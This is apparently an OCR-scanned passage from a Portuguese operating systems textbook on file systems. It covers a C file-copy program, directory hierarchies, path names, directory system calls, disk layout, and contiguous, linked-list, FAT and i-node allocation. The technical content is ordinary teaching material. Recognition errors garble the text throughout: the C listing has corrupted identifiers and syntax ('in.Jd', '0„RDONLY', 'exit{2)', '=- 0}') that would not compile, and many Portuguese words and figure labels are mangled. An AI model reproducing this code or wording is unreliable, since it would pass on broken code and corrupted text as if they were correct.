
if (argc != 3) exit(1); 


/* i n cl u i os arquivos de cabeęalho neoessarios*/ 

/* protótipo ANS */ 

/* usa um tamanho de buffer de 4096 bytes*/ 
/* bits de proteęao para o arquivo de saida*/ 


/* erro de sintaxe se argc nao for 3 */ 


/* Abre o arquivo de entrada e cria o arquivo de salda*/ 
in.Jd = open(argv[1], 0„RDONLY); /* abre o arquivo de ongem*/ 
if (in_fd < 0) exit{2); /* se nao puder ser aberto, saia*/ 

out_fd = creat(argv[2], OUTPUT_MODE); /* cria o arquivo de destino */ 
if (out_fd < 0) exit(3); /* se nao puder ser criado, saia*/ 


/* Laęo de copia*/ 
while (TRUE) { 

rd_count = read(in_fd r buffer, BUF.SIZE);/* Iś um blocode dados*/ 
if (rd count <= 0) break /* se firn de arquivo ou erro, sai do lago*/ 

wt_eount = write(out_fd, buffer, rd_count); /* escreve dados*/ 
if (wt_count <= 0) exit(4); /* wt_count <= 0 ś um erro */ 


/* Pecha os arquivos*/ 

close(in_fd); 

c!ose(out_fd); 

if (rd_count =- 0} /* nenhum erro na ultima teitura*/ 

exit{0); 

else 

ex it{5); /* e rro na u I tim a le itu ra */ 


I Figura 4.3 Um progmma sśmples para coptar um arquivo. 

e protótipos de funęoes no programa. Essas indusoes sao 
neccssarias para adeąuar o programa aos padroes interna- 
rionais rdevantcs, mas nao nos intcressara daqui para dian¬ 
ie. A próxima lin ha ć um protótipo dc funęao para mam, 
algo necessario para manier o padnie ANSI C, mas tambćm 
nao e relevante para nossos propósitos. 

O primeiro comando Udefimć a defimęao de uma ma- 
cro quc estabelece o tamanho de uma cadeia BUF_SIZE 
como uma macro que e expandida como o numer o 4.096. 
O programa lcra c escrevera cm pcdaęos dc 4.096 bytes. E 
considerada uma boa pratica dc programaęao dar noiiics 
como csse as conslames c usar os nomes c nao os próprios 
yalores. Essa convenęao nao só torna os programas mais 
laceis de lec mas lambem mais faccis de manier. O segundo 
comando tidefine determina quem pode ter acesso ao arqui- 
vo de safda. 


O programa principal e chama do miin e tern dois ar- 
gumentos, ar$c e ar$v, fornecidos pelo sistema operadonal 
ąuando o programa e chamado. O primeiro diz ąuantas ca- 
deias dc caractercs cstavam presemes na lin ha dc coman¬ 
do que invocou o programa, inclusive seu nonie. No caso, 
deveriam ser u es. O segundo e um arranjo de pomdros 
para os argumemos* No exemplo da cha mada dado ante- 
riorrneme, os dementos desse arranjo conteriam pomdros 
para os seguintes valores: 

argv[0] - “copyfile” 
argv[1] = “abc” 
argv[2] = "xyz rl 

fi por esse arranjo que o programa tein acesso aos ar- 
gumemos. 
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Sao dęcia radas cinco variaveis. As duas primeiras, in_fd 
e out_fd, eon tera o os descritores de arquivo, va!ores in- 
iciros peąuenos devolvidos quando um arquivo e a berło, 
As duas seguintes, rdjcowtt e wt_coum t sao os comadores 
de bytes devolvidos pclas chamadas de sistema read e write, 
respectivamente. A ultima, buffer, c o btiffer usado para 
eonter os dados lidos ou disponibilizados para a escrifa. 

O primeiro comando verifica sc o valor de anjc c 3. Se 
nao for, o próg rama terminara com um código de status I. 
Qualquer código de status que nao seja 0 significa a ocor- 
renria de um erro. O código de status e a unica maneira 
de rcp.oitar erros nesse programa, Uma versao eomerdal 
norma] menie Lambern imprimiria as mensagens de erro, 

Entao, tentamos abrir o arquivo dc origem c criar o 
arquivo de destiuo, Se o arquivo de origem for aberio com 
sucesso, o sistema atribuira um peąueno valor inteiro a m_fd 
para idcmificar o arquivo. As chamadas subseąuemes de- 
vem indu i r esse valor inteii o a ftm de que o sistema saiba 
qual arquivo ele quer. Da mesma maneira, se o arquivo de 
destino for criado coju sucesso, um valor sera atribufdo a 
out_fd para identifiear o arqnivo, O segundo argument o 
de creat estabelece o modo de proteęao. Se a abenura ou a 
criaęao falhar, o descritor do arquivo eorrespondente eon- 
tera -1 e o programa saira com um código de erro. 

Agora entra em aęao o laęo da cópia; Esse laęo comeęa 
lentando ler 4 KB de dados para o btiffer. Isso e feilo por 
meio da dra mada de pcocedmienlo de biblioteca read, que 
na yerdade invoca a chamada de sistema read, O primeiro 
parametro idemiftea o arquivo, o segundo fornece o buffer e 
o terceiro informa quantos bytes deverao ser !idos. O valor 
atribufdo a rd_count fornece o mi mero dc bytes realnienie 
lidos, Normalnienie seriam 4.096, a nao ser que restassem 
apenas alguns bytes no arquivo. Quando o fim do arquivo 
e alcanęado, o numero de bytes e 0. Se o rd_amnt for 0 ou 
negativo, a cópia nao podera prosseguire, assim, o coman¬ 
do break sera otecuiado para finalizar o laęo (do contra do 
pcnnaneceria e tern amen te executando). 

A cluimada write descarrega o buffer no arquivo de des¬ 
tino. O primeiro parametro identifica o arquivo, o segundo 
fornece o buffer e o terceiro infamia quantos bytes escre- 
vcr, semelhame a read. Observc quc o contador de bytes e 
o numero de bytes realnienie lido e nao o BUF_SIZE. Isso 
e import antę porque a ultima leitura nao retornara 4.096, 
a menos que o arquivo coinddentemente tenha um tama- 
uho muitiplo de 4 KB. 

Quando todo o arquivo iiver sido processado, a pri- 
meira chamada alem do fim do arquivo retornara 0 em 
rdjtount, o que o fara sair do laęo. Nesse porno, os dois 
arquivos sao fechados e o programa sal com o status indi- 
cando um tórmino normaI. 

Embora as chamadas de sistema do Windows sejam 
diferentes das chamadas do UNIX, a estrutura gcral dc um 
programa ativado pda linha de comando no Windows para 
copiar um arquivo e um pouco paredda com a da Figura 43. 
Estudaremosas chamadas do Windows Vista no Capftulo 13. 


Di retor ios 


Para controlar os arquivos, os sistemas de arquivos 
tent, em geral, diretórios ou pastas, que em nmitos sis¬ 
temas tambem sao arquivos, Nesta seęao discutiremos os 
diretórios, suas organizaęoes, propriedades e operaęóes, 

*•2.11 Sistemas de diretório em nivel unico 

A maneira mais simples de um sistema de diretório e 
ter um diretório comendo todos os arquivos. Algumas vczcs 
dc e cha mado dc diretório-raiz, mas, como dc e só um, 
o nonie nao importa muito. Nos primeiros computadores 
pessoais, esse sistema era eomum, cm parie porquc havia 
somente um usuario, Curiosamente, o primeiro supercom- 
putador do mundo, o CDC 6600, tambem linha somente 
um diretório para todos os arquivos, mesrno sendo osado 
por varias pessoas ao mesrno tempo. Essa dedsao foi sem 
duvida tornada para tornar o projeto de software simples. 

Um exempJo dc sistema com um diretório c i lustra do 
na Figura 4,4, Nela, o diretório contem quatro arquivos. As 
vamagcns desse esquema sao a simpliddadc e a capaeidade 
de localizar os arquivos rapidamente — afinal, ha somen- 
te um lugar onde procurar. Ele normalnienie e usado em 
sistemas embarcados simples, como telefones, ca me ras di- 
gitais e alguns players portateis de ni Lisica. 

4.2.21 sistemas de diretórios hierarquicos 

O nfvd unico e adeąuado para aplicaęoes dedicadas 
simples (e chegou a ser usado nos primeiros computadores 
pessoaisb mas, para os u su a ri os modemos com milhóes de 
arquivos, seria imposswe! encontrar qualquer colsa se to¬ 
dos os arquivos esiivessem em um unico diretório. 

Assim sendo, e preciso encontrar urna maneira de 
agrupar os arquivos rdacionados em um mesrno local Um 
professor, porexempio, pode terum conjunto de arquivos 
que, juntos, formam um livro que cle es tej a escrevendo 
para um curso, um segundo conjunto de arquivos eon len- 
do os programas que sens almios submeteram como ava- 
liaęao em mitro curso, um terceiro conjunto de arquivos 
comendo o código de um sistema de compilador avanęado 
que ele esta conslruindo, um quarto conjunto de arquivos 
sobie propostas de projetos, bem como outros arquivos de 
mensagens detrónicas, mi nu ta s estabelecidas em reimióes, 
artigos que ele esteja escrevendo, jogos e assim por dianie* 

Faz-se necessaria urna hierarqma geral (isto e, u ma an 
vore de diretórios). Com essa estralegia, cada usuario pode 


*- Diretório- rai z 



I Figura 4.4 Um sistema de diretórios em nfvd Onico contendo 
Ou 


quatrt> arquivos. 
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ter tam os diretórios quanło necessario para agrupar os ar- 
quivos de unia maneira natura!. Alem disso, se varios usua- 
rios compartilham o mesmo seiyidor de arquivos, como e o 
caso das rcdcs de mukas emprcsas atuais, ca da usuario pode 
ter urn diretório-raiz particular para criar sua própiia hic- 
rarąuia. Essa estrategia e most rada na Figura 4.5, em que os 
diretórios A f B c C conlidos no diretório-raiz pertcncem, cada 
utn deles, a um usuario diferente; dois desses usuarios cria- 
ram sub diretórios para projetos nos quais esiao trabaihando. 

A capaddade para os usuarios cna rem um nu mero a rbi - 
trario de subdiretórios propicia urna ferranienia poderosa de 
estruturaęao para organizar seu trabalho, Por isso, quase lo- 
dos os modernos sistemas de arquivos sao organizados assim. 

4,2.51 Komes de camłnhos 

Quando o sistema de arquivos e organizado como urna 
arvore de diretórios, e predso algum modo de es pe ci fi car o 
nonie dos arquivos, Sao usados, comumcme, dois metodos, 
No primGiro, a cada arquivo e dado um nome de cami- 
nhoabsotuto, formado pelo camiiiho ciurę o diretório-raiz 
e o arquivo. Como exemplo, o caminho /nsrfasi/caixapostaI 
signilica que o diretório-raiz contem um subdiretório usr, 
que, por sua vez, contem um subdiretório usi, ąu e contem 
o arquivo aihapoml. Nomes de caminhos absoiutos sempre 
inicia lizani no diretório-raiz e sao unicos. No UNIX, os com- 
ponemes do caminho sio separados por L No Windows, o 
sępa rad or e V No MULTICS, era >, Portanto, o mesmo nome 
de caminho poderia ser escrito nesses tres sistemas como; 

Windows \usr\ast\caixapostal 

UNIX /usr/ast/caixapostal 

MULTiCS >usr>ast>caixapostal 

Nao im por ta qual caractere e usado; se o primeim ca- 

ractere do nome de caminho for o separador, entao o ca mi¬ 
ii ho sera absoluto* 

O oiitro tipo de nonie e o nome de caminho reiati- 
vo, Ele e usado com o conceito de diretório de trabalho 
(lambem chamado de diretório atuai). Um usuario pode 
designar um diretório como o diretório atuai de trabalho, 



de usuario 


no qual todos os nomes de caminho que nao comecem no 
diretório-raiz sao assumidos como relativo$ ao diretório de 
trabalho. Por exemplo, se o diretório de trabalho atuai for 
łusr/ast r entao o arquivo cujo caminho absolnto for /usrfmtf 
caimpostal pode ser referenciado simplesmente como calm- 
-postai Em outras paiavras, o comando UNLX 

cp /usr/a$t/caixapostal /usr/ast/caixapostal,bak 
e o comando 

cp caixapostal caixapostalbak 

fazem exatamente a mesma coisa se o diretório de trabalho 
for łusrfasL A forma rdativa e muitas vezes mais convc- 
niente, realizando a mesma coisa que a forma absolula. 

Alguns programas predsam ter acesso a um arquivo 
espeeffleo sem se preocupar em saber qual e o diretório de 
trabalho, Nesse caso, des dcvem sempre usar nomes de ca- 
mmhos absolutos. Por exempIo, um verificador ortografico 
pode prccisar ler łmrfbibfdkimarw para fazer scu trabalho, 
Ele u sana entao o nome com ple to do caminho porque nao 
sabe em qnal diretório de trabalho estara quando for cha- 
mado. 0 nome dc caminho absolnto sempre funcionara, 
seja qual for o diretório de trabalho* 

Naturalmente, se o verificador ortografico for prccisar 
de diverso$ arquivos de fmrfhib t urna estrategia aUernativa 
e emitir urna cha mada dc sistema a llera udo seu diretório 
dc trabalho para /usr/bib e, entao, usar apenas dicionarw 
como o primeim parametro de open. Aherando explicita- 
rnente o diretório de trabalho, o verificador sabe com se- 
guranęa onde ele esta na arvorc de diretórios c, portanto, 
pociera usar nomes de caminhos rdativos, 

Cada processo tern seu próprio diretório de trabalho; as¬ 
sim, quando um processo altera seu diretório de trabalho 
e depois sai, nenhum outro processo e afetado e nenhum 
vcsifgio da mudauęa e deixado no sistema de arquivos, 
Desse modo, e perfeitamente seguro para urn processo al- 
terar seu diretório de trabalho quando for conveniente. Por 
outro lado, se u,ma rotina de blbUoteca alterar o diretório de 
trabalho e nao voltar para onde estava quando terminar, 
o resto do próg rama pode r a nao funcionar, pois sua supo- 
sięao sobre onde esta pode se encontrar agora inesperada- 
mente iiwalida. Por isso, rotinas de biblioteca raramente 
alteram o diretório de trabalho e, quando precisam fazc-te 
elas sempre voltam para onde estavam. 

A maioria dos sistemas operacionais que da o su porte a 
um sistema de diretório liierarąuico tern duas entradas es- 
peciais em cada diretório, V egeralmente pronunciadas 
como 'ponto' e 'pomopomo'. O porno refere-se ao diretório 
atuai; pontoponto refere-se a seu pai. Para verificar como 
essas entradas sao usadas, considere a arvote de diretórios 
UNIX da Figura 4.6. Um dado processo tern como diretório 
de trabalho lusrłasL O .. pode ser usado para subir um nfvel 
na arvore. Por exemplo, ele pode copiar o arquivo /usrfhibf 
didonano para seu próprio diretório usando o comando 


I Figura 4,5 Um sfstema hierarquico de diretórios. 


cp ../bib/dicionario . 
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/ 



l Figura 4,6 Uma arvore de diretórios UNiX. 

O primeiro caminho instrui o sistema a subir (para o 
di retor i o w) e depois a deseer ate o diretório bib e en con¬ 
tr ar o arquivo dickumrio. 

O segundo argumcnto (ponto) rcfcrc-se ao diretório 
atual* Quando o comando cp tem como seu ultimo argu¬ 
ment o um ii o me de diretório (inclusive ponto), ele copia 
todos os arquivos la. Ć claro que uma maneira mais simples 
de fazer a cópia seria usar o nonie de caminho completo do 
arquivo-fonte: 

cp /usr/bib/dicionarEo. 

Ncssc easo, o uso do ponto evita que o usuario digite 
didonario duas vezes. De qualquer maneira, digitar 

cp /usr/bib/dicionario dici orano 
tambem fu n ci on ar a, assim como 

cp /usr/bib/dicionario /usr/ast/dicionario 

Todos esses co m and os lazcrn exatamente a mesma coisa, 

4.2.41 Operaęóes com diretórios 

As chamadas dc sistema quc pod cm gcrcnciar diretórios 
ni os tram maior variaęao dc sistema para sistema quc as eha- 
madaspara gerendararquivos. Para darnina ideia sobrc quais 
sao e como fundonain, daremos um emnplo (do UN1X), 

1. Create. Cria um diretório. Um diretório vazio P exceto 
por ponto e pontoponto, quc sao inscridos antoma- 


licameme pelo sistema (ou r em alguns casos, pelo 
program a mkdir). 

2* Delete. Remove um diretório, Someme um diretório 
vano pode ser rcmovido* Um diretório que conte- 
nha sooiente ponto e pontoponto e considerado va- 
zio, ja quc cles nao podem ser removidos. 

3. Opendir. Permiie a leitura de diretórios. Por exem- 
plo, para rei a ci on ar todos os arquivos em um dire- 
tório, um próg rama de lisugem abre o diretório para 
ler os nomes de todos os arquivos que de centem* 
Antcs de ser lido, o diretório dcvc ser abcrlo, analo- 
gamę nte a a beri u ra de u ni arquivo para leitura, 

4, Closedir, Quando acabar dc ser lido P o diretório deve 
ser fediado para liberar espaęo na tabela interna. 

5* Readdir. Essa chama da devolve a próxima entrada 
em um diretório abcrlo. Antigamentc era possfvcl 
ler diretórios usando a cha mada de sistema read. 
Gont udo, essa estrategia linha a desvantagem de 
obrigar o programador a conhecer e lidar com a es- 
trutura interna dos diretórios* Por outrolado, readdir 
sempre retorna inna entrada cm um formato padro- 
nizado, nao im porta ndo qual das possfveis estru tu - 
ras de diretório esleja sendo usada. 

6, Rename* Etn muitosaspectos, os diretórios sao como 
arquivos e podem, da mesma maneira, ter seu nonie 
trocado, 
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7. Link, A ligaęao (linkimj) € unia tecnica que possi- 
bifita a um arqusvo aparecer em mais dc urn di- 
retório, Hssa chainada dc sislema especilica um 
arquivo existeme e um nonie de caminho e, en- 
tao, cria urna ligaęao do arquivo existeme com o 
nonie especificado pelo caminho. Dessa maneira, 
o mesmo arquivo pode aparcccr em varios dire- 
tórios. Uma ligaęao dcssc tipo, que incrementa o 
co n ta do r no i modę do arquivo (para monitorar o 
niimero dc cmradas de direiório contendo o arąui- 
vo) H e chamada, algumas vezes r de ligaęao estrita 
{hard link), 

$. Unlink. Keniove inna enlrada dc direiório. Se o ar- 
quivo sendo desligado estiver presente em apenas 
um direiório (o caso norma I), de sera removido do 
sislema dc arquivos. Sc cstivcr presente cm varios 
direiórios, somerue o nome do caminho especifi¬ 
cado sera removido t Os outros permanecem, No 
UN1X, a cha ma da de sistema para remover arqui- 
vos (discutida antenatmenie) ć\ na verdadc, unlink, 

Essa lista mostra as chamadas mais importantes, mas 
tambem ha algumas outras, empregadas, por exemplo, 
para gerendar a mformaęao de proleęao associada com um 
diretório. 

Oma variaęao da ideia de ligar arquivos e a ligano 
simboJica, Em vez de ter dois nomes aponiando para a 
mesma estru tu ra de dados interna que represema mn ar- 
quivo f c possfvd criar um nome que aponte para um pe- 
queno arquivoque nomeia umsegundo* Quando o primei- 
ro arquivo e usado — abeno f por exemplo— o sistema de 
arqulvo$ segue o caminho e encontra o nome no finał Em 
segukia, reinicializa o processo de locaiizaęao com o nome 
do novo arquivo. As ligaęoes simbólicas tem a vamagcm dc 
comeguir atravessar as fronteiras dos discos e a te mesmo 
de nomes dearquivos em compuiadores remotos. Sua im- 
plementaęao, entretanto, e um pouco menos efidentc do 
que a da Hgaęao estrita. 


4.3 


Implementaęao do sistema de 
arguiyos 


Agora e hora de passar da visao do usuario do sistema 
de arquivos para a visao de sen implemeniador. Os usua- 
rios se preocupam em como mu dar nomes de arqnivo, 
quais operaęoes sao permitidas, como e a arvore de dire- 
tórios e questÓes sobre a interface. Ja os imp leniem a dores 
estao interessados em como arquivos e diretórios sao ar- 
mazenados, como o cspaęo em disco c gerenciado e como 
fazer tudo fimcionar efidente c confiavclmcntc. Nas próxi- 
mas scęoes cstudarcmos varias dessas areas para entender 
sens lópicos e seus compromissos* 


4.5.11 Esquema do sistema de arquivos 

Os sistemas dc arquivos sao ar ma ze na dos em discos. A 
maioria dos discos c d md id a em uma ou mais partięóes, com 
sistemas de arquivos independentes para eada partięao, O 
setor 0 do disco e cha mado dc MBR {master boot record — 
registro mesire de i ni ci a li za ęa o) c e usado para inirializar o 
computador. 0 firn do MBR eon tem a tabela depanięao, que 
indica os endereęos iniciais c finaisde cada partięao. Utną das 
partięóes na labela c marcada como ativa. Quando o compu- 
lador e inicializado, a BIOS Ić e execnia o MBR. A primeira 
coisa que o programa do MBR faz e localizar a parlięao aliva, 
ier seu primeiro bloco, chamado dc bloco de inidalizaęao, 
e execula-lo. O programa no bloco dc inidalizaęao carrcga o 
sistema operadonal contido naąuela partięao. Por imilormi- 
da de, loda partięao tem cm seu initio um bloco dc inidaliza¬ 
ęao, mesmo que da nao contcnha um sistema operadonal 
que possa ser inicializado, Alem disso, a partięao podera fu- 
tnramente contcr um sistema operadonal 

Fora iniciar com um bloco de inidalizaęao, o esąuetna 
dc urna partięao dc disco vana basta mc dc um sistema dc 
arquivos para oulro. E comum quc o sislema de arquivos 
contcnha algum dos itens mostrados na Figura 4.7. O pri¬ 
meiro 6 o $uperbloco r quc contćm todos os principais pa- 
rametros sobre o sistema de arquivos e ć lido na memória 


- 4 - 


Disco inteiro 




Tabela de partięao 

\ 



Partięao 
do disco 


+ 




l Figura 4.7 Uma organlzaęao possivei para um sistema de arquivos. 
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quando o eomputador e inicializado oti quando o sistenia 
de arquivos e utilizado pda primeira vez. A inforinaęao tf- 
pica no superbloco consiste em mu niimero magfco para 
identificar o tlpo de sistema dc arquivos, o numero de blo- 
cos no sistema dc arquivos c out ras informaęóes importan- 
tcs dc cunho ad ministrativo* 

Depois vem a informaęao sohre os blocos livres no sis¬ 
tema de arquivos — por exemplo, na forma de urn mapa 
de bits on de urna lista de pomeiros. Isso pode ser seguido 
pelos i-nodes, om arranjo de estruturas de da des, uma por 
arquivo, que diz tu do sobrc o arquivo. Depois pode vir o 
diretório-raiz, que contcm o topo da arvorc do sistema dc 
arquivos> Por firn, o restante do disco, quc possui, cm gcral, 
todos os ouiros diretórios e arquivos. 

4.5.11 Implementacjo de arqiiivo$ 

A ąuestao mais importante na implcmentaęao do ar- 
mazenamemo de arquivos taivcz seja a manuienęao do 
conlroic dc qu ais blocos de dis cos estao rdadonados a ąuais 
arquivos, Sao usados varios metodosem diferentes sisiemas 
operacionais. Ncsta seęao, estudaremos alguns dcles. 

Alocaęao contigua 

O csqucma mais simples dc alocaęao ć armazenar ca da 
arquivo em blocos contiguos dc disco. Asstm, em um disco 
com blocos de I KB, um arquivo com 50 KB seria alocado 
em 50 blocos consecutivos, Com blocos de 2 KB, o arquivo 
seria alocado cm 25 blocos consecutivos. 

Ycnios um exemplo de alocaęao cm armazenamento 
contiguo na Figura 4,S(a). Nela sao mostrados os primciros 
40 blocos de disco, inicializando com o bloco 0 na csqucr- 
da. Inidalmentc o disco estava vazio, En tao, um arquivo 
A, ocu pando quatro blocos, foi escrito no disco a pa i tir do 
inicio {bloco 0). Depois dele, um arquivo de seis blocos, B t 
foi escrito a direita, ao finał do arquivo A. 

Arquivo A Arquivo C 

(4 blocos) (6 blocos) 


■■■■■■■■■■■■■ 


ArquIvo B Arquivo D 

(3 blocos) {5 blocos) 

(a) 


Notę que cada arqitivo comeęa no inicio de um novo 
bloco; assim, se um arquivo A realmente ocupar tres blocos 
c meio, um espaęo no finał do ultimo bloco sera desperdi- 
ęado, Na figura, e mostrado um total de sete arquivos, cada 
um inicializando no bloco seguimc ao finał do anterior, O 
sombreamento e usado apenas para tornar mais facil a vh 
sualizaęao de cada arquivo. Ele nao causa impacLossignifica- 
tivos em termos de armazenamento. 

A alocaęao de espaęo contiguo dc disco tern duas van- 
tagens significativas. Primeiro, e simples de implementar 
porąue o eon trale sobie ondc os blocos de um arquivo 
estao e reduzido apenas a lernbrar dois numeros; o ende- 
reęo em disco do primeiro bloco e o niimero de blocos no 
arqinvo. Dado o niimero do primeiro bloco, o nu mero de 
qualquer outro bloco pode ser encontrado por uma sim- 
ples adięao. 

Em segundo ługar, o deseinpenho da leitura e excelen- 
te, pois todo o arquivo pode ser lido do disco em uma imi- 
ca operaęao. Ć preciso somente um po siei ona me nto [seek) 
(para o primeiro bloco), Depois disso, nao sao necessarios 
mais posidonamentos on atrasos rotacionais, dc modo quc 
os dados sao lidos de acordo com a capacidade total do dis¬ 
co. Porta nto, a alocaęao contigua e simples de implementar 
e tem um alto desempenho. 

Infelizincntc, a alocaęao contigua tamboru tem um pon- 
to fraco sigmficativo: com o tempo, o disco fica fragmentado. 
Para entender como isso acontece, veja a Figura 4.8{b). 
Nela ha dois arquivos, D e F f que foram removidos. Quan- 
do um arqiuvo e removido, sens blocos sao naturalmente 
liberados, deixando uma laama de blocos livrcs no dis¬ 
co. Este nao e i media ta menie compactado para eliminar 
essa lacuna, pois isso acarrctaria a cópia dc todos os blocos 
que seguissem a lacuna — potendalmente milhoes deles. 
Como resultado, o disco ć formado por arquivos e lacunas, 
conforme i lustra a figura, 

Arquivo E Arquiyo G 

(12 blocos) (3 blocos) 


• i ■■■■ 


Arquivo F 
(6 blocos) 


i 


(ArquivoA) (Arq.uivoC) (ArquivoE) (ArqutvoG) 



n 


11111111111111111111111111111 


■■■ 


Arquivo B 5 Blocos livres 6 Blocos livres 

(b) 

Figura 4.8 (a) A atocaęao contigua do espaęo em disco para sete arquivos t (b) O estado do disco depois de os arquivos D e F 
terem sido remoySdos, 
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Inicialmente, essa fragmemaęao nao e um próbie ma, pois 
Gida uovo arquivo pode ser escrito no finał do disco, seguin- 
do o anten on Gont udo, ao finał, o disco estara todo preen- 
chido c sera necessario entao compacla-lo, o quc e proibi- 
tivamente clisloso, ou entao rcutilizar o espaęo livre nas 
lacunas, o que reqtier a mamuenęao de listas de lacunas — 
algo viavd. Contudo, ąuando um novo arquivo estiver para 
ser criado, sera necessario saber sen lamanho finał para es- 
colher utną lacuna de lamanho adeąuado para aiocado. 

Imagine as eonsequendas desse tipo de projeto. O usua- 
rio inicializa um editor ou um processador de texio para 
escrever um documcnto* A primeira coisa que o progra- 
ma perguma e ąuantos bytes o documento finał contera. 
A questao deve ser respondjda ou o programa na o prosse- 
guira. Se o numero dodo se mostrar peąueno, o programa 
tera dc terminar prematnramente, pois a lacuna no disco 
esta preenchida c nao ha lugar para o resLame do arquivo. 
Se o usuario temar eviiar esse probienia fornecendo um 
valor irrealisticomcnte grandę como lamanho finał — por 
exemplo, 100 MB —, o editor podera ser incapaz de en- 
contrar urna lacuna tao grandę e avisara que o arquivo nao 
pode ser cna do. Claro, o usuario c stada livre para eomeęar 
o programa novamente c ardscar 50 MB dessa vczc r assim, 
cominuar ale que unia lacuna adequada seja enconirada. Essc 
esquema certamente nao deixaria seus usuarios coniemes. 

Contudo, ha u ma situaęao na qual a alocaęao contfgua 
e viavel e, na verdade, amplamente usada; em CD-RGMs, 
Nelcs todos os tamanhos de arquivos sao conhcddoś com 
antecedencja c min ca se altcrarao d u ranie o uso subsc- 
ąuente do sistema de arquivos do CD-ROM. Estudaremos 
o sistema dc arqmvo$ mais comum para CD-ROM postc- 
riormente neste capitulo. 

No caso dos DVDs, a situaęao e um pouco mais com- 
plicada. Em principio, um filmc de 90 mi mit os poderia ser 
codificado em um unico arquivo com 4,5 GB de tamanho 
aproximado* Entretanto, o sistema de arquivos milizado —- 
UDF (uniwrsal disk format — formato un wersal de disco) — 
uiiliza um numero dc 30 bits para representar o tamanho 
do arquivo, o que limita o tamanho maximo a I GB. Como 
resukado, os fil mes de DVD cosmmam ser divididos em 
tres ou ąualro arquivos de 1 GB cada c armazenados comi- 
guameme. Esses pedaęos individuais de um unico arquivo 
lógico (o filmc) sao chamados extensdes. 

Como mcncionado no Capitulo I r a historia muitas vc- 
zes sc repetę na cicncia da computaęao eon formę o advento 
de novas gcraęoes de tecnologia* A alocaęao contfgua fot 
realnienie usada em sistemas de arquivos de discos mag- 
neticos, ha mukos a nos, por sua simplicidade e sen alto 
desempenho (quando, para mukos, ser ou nao amigavel ao 
usuario nao fazia diferenęa). Entao, a ideia foi descartada 
pelo incomodo de ter de especificar o tamanho do arquivo 
no momento de sua criaęao. Mas, com o advento dos CD- 
ROMs, DVDs e outras rnfdias ópticas para escrita unica, os 
arquivos co migu os, de urna hora para omra, novamentese 


tornaram urna boa ideia. fi, porta mo, importame estudar 
velhos sistemas e ideias que eram conceitualmente cłaros e 
simples, pois podem ser aplicaveis em sistemas fuiuros de 
maneiras surpreendentes. 

Alocaęao por lista encadeada 

O segundo metodo para armazenar arquivos e mantę- 
-los, cada um, como urna lista encadeada de błocos de disco, 
eonlorme mostra a Figura 4.9. A primeira palavra de cada 
bloco e usada como ponteiro para um próximo. O restante 
do bloco e usado para da dos. 

Nesse metodo, d i fe ren te men te da alocaęao contfgua, todo 
bloco de disco pode ser usado. Nenhum espaęo e perdido pela 
fragmemaęao (a nao ser pela fragmemaęao interna do ultimo 
bloco). Alem disso, para manier urna entrada de diretório, c 
suficie nic armazenar apenas o cndcrcęo em disco do primci- 
ro bloco* O restante pode ser encontrado a partii dele. 

Por outro łado, embora a leitura seąuencial seja direta, 
o acesso alcaiório e extremamcnte lento. Para chegar ao 
bloco n r o sistema operadonal, a panir do infcio, deve ler 
os n - 1 błocos a mes dele, um de cada vez. OLwiamente, 
realłzar lamas leituras e exageradamentc lento. 

Alem disso, a qtiantidadc de dados quc um bloco 
pode armazenar nao e mais urna poi en da de dois porque 
os ponteiros ocupam alguns dos bytes do bloco. Embora 
nao seja fatal, um tamanho peculiar de bloco e menos cfi- 
ciente, pois muitos programas ieem e escrcvem em błocos 
cujo tamanho c urna potencia de dois. Com alguns dos prt- 
ineiros bytes ocupados por um ponteiro para o próximo 
bloco, a leitura de todo o bloco requcr obtere eon cal cna r 
a informaęao de dois błocos de disco. Essa copia gera urna 
sobrccarga exlra + 

Alocaęao por lisia encadeada usando uma tabela na 
memória 

As desvantageos da alocaęao por lista encadeada po¬ 
dem ser eliminadas colocando-se as palavras do ponteiro 



Bloco 4 7 2 10 12 

ffsico 


Arquivo B 



Bioco 6 3 11 14 

ffsico 

Figura 4.9 Armazenamento de um arquivo como uma lista 
I ertcad&ada de błocos de disco. 
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de cada bloco em urna tabela na memória. A Figura 4.10 
mostra como sao as tabdas para o exemplo da Figura 4.9. 
Nas duas figuras temos dois arquivos. O arquivo A usa os 
blocos 4, 7, 2, 10 e 12 e o arquivo B, os blocos ó, 3, 11 e 
14, ambos ncssa ordem, Usando a tabela da Figura 4.10 e 
possivcL partindo do bloco 4, seguir o cncadcamcnto ate 
o finał. O mesmo pode ser fcilo patlindo-se do bloco ó, 
Ambos os encadeamentos tern inna marca de ter mino (por 
exemplo, -1} que corresponde a um nu mero mvalido de 
bloco. Essa tabela na memória principal e cha mada de FAT 
{file allocation table) ou tabela de alocaęao de arquivos. 

Usando essa organizaęao, rodo o bloco lica disponivcl 
para dados* Alćm disso, o acesso aleatório sc toina mu i to 
mais fariL Embora ainda seja nccessario seguir o coca- 
deamento para enconirar um dado ckslocamento dentro 
do arquivo H o encadeamemo permanece imeirameme na 
memória, de modo que pode ser seguldo sem fazer qual- 
quer referencja ao disco. Como no metodo anterior, um 
inteiro simples (o immero do bloco inidal) e o suficiente 
para representar urna entrada de direiório, permitindo a 
localizaęao de rodos os blocos do arqtiivo, nao importando 
seu tamanho. 

A principal desvamagem desse metodo e que, para 
funcionar, toda a tabela deve estar na memória o tempo 
lodo. Para um disco de 200 GB e blocos de 1 RB, a tabela 
precisara de 200 milhoes de entradas, u ma para cada um 
dos 200 milhoes de blocos de disco. Cada entrada tern no 
mm im o 3 bytes. Para aumentar a velocidade de consulta, 
eJas deveriam ter 4 bytes. Ponanto, a tabela ocupara 600 MB 
ou 800 MB de memória principal o tempo lodo, dependen- 
do dc a otimizaęao do sistema ser por cspaęo ou por tempo. 


o que nao e muito pratico. A ideia de organizaęao da FAT 
claramente nao engłoba os discos grandes, 

l-rtodes 

O ultimo metodo que abordarernos aqui para contro- 
lar quais blocos pcrtencem a quais arqmvos consiste em 
assodar a cada arquivo u ma estrutura dc dados cha mada 
i-node (index-mde ou nó-mdice), que relaciona os atributos c 
os endercęos em disco dos blocos dc arquivo. Um exemplo 
simples e ilustrado na Figura 4.11. Dado o i-node, e entao 
possivel encontrar todos os blocos do arquivo. A grandę 
vantagem desse esąuema sobre os arquivos encadeados 
quc usam urna tabela na memória e que o i-node só pre- 
risa estar na memória quando o arquivo correspondente 
se encontrar a berto. Sc cada i-node ocupar n bytes e um 
maximo de k arquivos pudercm estar abertos ao mesmo 
tempo, a memória tota! ocupada pelo arranjo contendo o 
i-node para os arquivos abertos e de apenas kn bytes. So- 
mente esse espaęo precisa ser aniecipadameme reservado. 

